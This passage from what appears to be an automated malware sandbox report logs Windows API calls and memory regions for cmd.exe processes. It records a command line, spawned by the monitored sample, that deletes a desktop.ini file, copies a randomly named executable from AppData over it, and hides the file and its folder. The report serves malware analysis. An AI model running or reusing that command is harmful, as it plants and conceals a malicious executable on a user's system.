lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.059] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.059] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.060] GetFileType (hFile=0x4c) returned 0x1 [0212.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.104] GetFileType (hFile=0x4c) returned 0x1 [0212.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.104] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.105] GetFileType (hFile=0x4c) returned 0x1 [0212.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.105] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.105] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.105] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x32, lpOverlapped=0x0) returned 1 [0212.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.105] GetFileType (hFile=0x4c) returned 0x1 [0212.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.105] GetFileType (hFile=0x4c) returned 0x1 [0212.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.105] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x32, lpOverlapped=0x0) returned 1 [0212.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.105] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.105] _close (_FileHandle=4) returned 0 [0212.105] FindNextFileW (in: hFindFile=0x360e78, lpFindFileData=0x2af484 | out: lpFindFileData=0x2af484) returned 0 [0212.106] GetLastError () returned 0x12 [0212.106] FindClose (in: hFindFile=0x360e78 | out: hFindFile=0x360e78) returned 1 [0212.106] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0212.106] _close (_FileHandle=3) returned 0 [0212.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.107] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0212.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.107] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0212.107] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.107] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0212.107] SetConsoleInputExeNameW () returned 0x1 [0212.107] GetConsoleOutputCP () returned 0x1b5 [0212.107] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.107] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.107] exit (_Code=0) Process: id = "520" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16940" os_pid = "0xa50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31204 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31205 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31206 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31207 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31208 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31209 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31210 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31211 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31212 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 31213 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31262 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31263 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31264 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31265 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31266 start_va = 0x440000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 31267 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31268 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31269 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31270 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31271 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31272 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31273 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31274 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31275 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31276 start_va = 0x100000 end_va = 0x1c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 31277 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31278 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31279 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31280 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31281 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31282 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 31283 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 31284 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 31285 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 31286 start_va = 0x12b0000 end_va = 0x157efff entry_point = 0x12b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 721 os_tid = 0x310 [0212.710] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efa8c | out: lpSystemTimeAsFileTime=0x2efa8c*(dwLowDateTime=0xb397fcc0, dwHighDateTime=0x1d440a9)) [0212.710] GetCurrentProcessId () returned 0xa50 [0212.710] GetCurrentThreadId () returned 0x310 [0212.710] GetTickCount () returned 0x3ba39 [0212.710] QueryPerformanceCounter (in: lpPerformanceCount=0x2efa84 | out: lpPerformanceCount=0x2efa84*=26949915509) returned 1 [0212.710] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0212.710] __set_app_type (_Type=0x1) [0212.711] __p__fmode () returned 0x76b331f4 [0212.711] __p__commode () returned 0x76b331fc [0212.711] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0212.711] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0212.711] GetCurrentThreadId () returned 0x310 [0212.711] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x310) returned 0x38 [0212.711] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0212.711] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0212.711] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.711] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efa1c | out: phkResult=0x2efa1c*=0x0) returned 0x2 [0212.712] VirtualQuery (in: lpAddress=0x2efa53, lpBuffer=0x2ef9ec, dwLength=0x1c | out: lpBuffer=0x2ef9ec*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.712] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef9ec, dwLength=0x1c | out: lpBuffer=0x2ef9ec*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0212.712] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef9ec, dwLength=0x1c | out: lpBuffer=0x2ef9ec*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0212.712] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef9ec, dwLength=0x1c | out: lpBuffer=0x2ef9ec*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.712] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef9ec, dwLength=0x1c | out: lpBuffer=0x2ef9ec*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0212.712] GetConsoleOutputCP () returned 0x1b5 [0212.712] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.712] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0212.712] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.712] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0212.712] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.712] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0212.712] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.712] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0212.712] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.712] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0212.713] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.713] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0212.713] GetEnvironmentStringsW () returned 0x4504a0* [0212.713] FreeEnvironmentStringsW (penv=0x4504a0) returned 1 [0212.713] GetEnvironmentStringsW () returned 0x4504a0* [0212.713] FreeEnvironmentStringsW (penv=0x4504a0) returned 1 [0212.713] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee98c | out: phkResult=0x2ee98c*=0x40) returned 0x0 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x0, lpData=0x2ee998*=0x50, lpcbData=0x2ee990*=0x1000) returned 0x2 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x1, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x0, lpData=0x2ee998*=0x1, lpcbData=0x2ee990*=0x1000) returned 0x2 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x0, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x40, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x40, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x0, lpData=0x2ee998*=0x40, lpcbData=0x2ee990*=0x1000) returned 0x2 [0212.713] RegCloseKey (hKey=0x40) returned 0x0 [0212.713] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee98c | out: phkResult=0x2ee98c*=0x40) returned 0x0 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x0, lpData=0x2ee998*=0x40, lpcbData=0x2ee990*=0x1000) returned 0x2 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x1, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x0, lpData=0x2ee998*=0x1, lpcbData=0x2ee990*=0x1000) returned 0x2 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x0, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x9, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x9, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x0, lpData=0x2ee998*=0x9, lpcbData=0x2ee990*=0x1000) returned 0x2 [0212.714] RegCloseKey (hKey=0x40) returned 0x0 [0212.714] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ae [0212.714] srand (_Seed=0x5b8863ae) [0212.714] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"" [0212.714] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"" [0212.714] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.714] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x451c00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0212.714] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.714] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.715] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0212.715] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0212.715] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0212.715] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0212.715] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0212.715] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0212.715] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0212.715] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0212.715] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0212.715] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0212.715] GetEnvironmentStringsW () returned 0x4525f0* [0212.717] FreeEnvironmentStringsW (penv=0x4525f0) returned 1 [0212.717] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.717] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0212.717] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0212.717] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0212.717] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0212.717] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0212.717] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0212.717] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0212.717] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0212.717] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0212.717] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef758 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.717] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef758, lpFilePart=0x2ef754 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef754*="Desktop") returned 0x18 [0212.717] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0212.717] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef4d4 | out: lpFindFileData=0x2ef4d4) returned 0x450c80 [0212.717] FindClose (in: hFindFile=0x450c80 | out: hFindFile=0x450c80) returned 1 [0212.717] FindFirstFileW 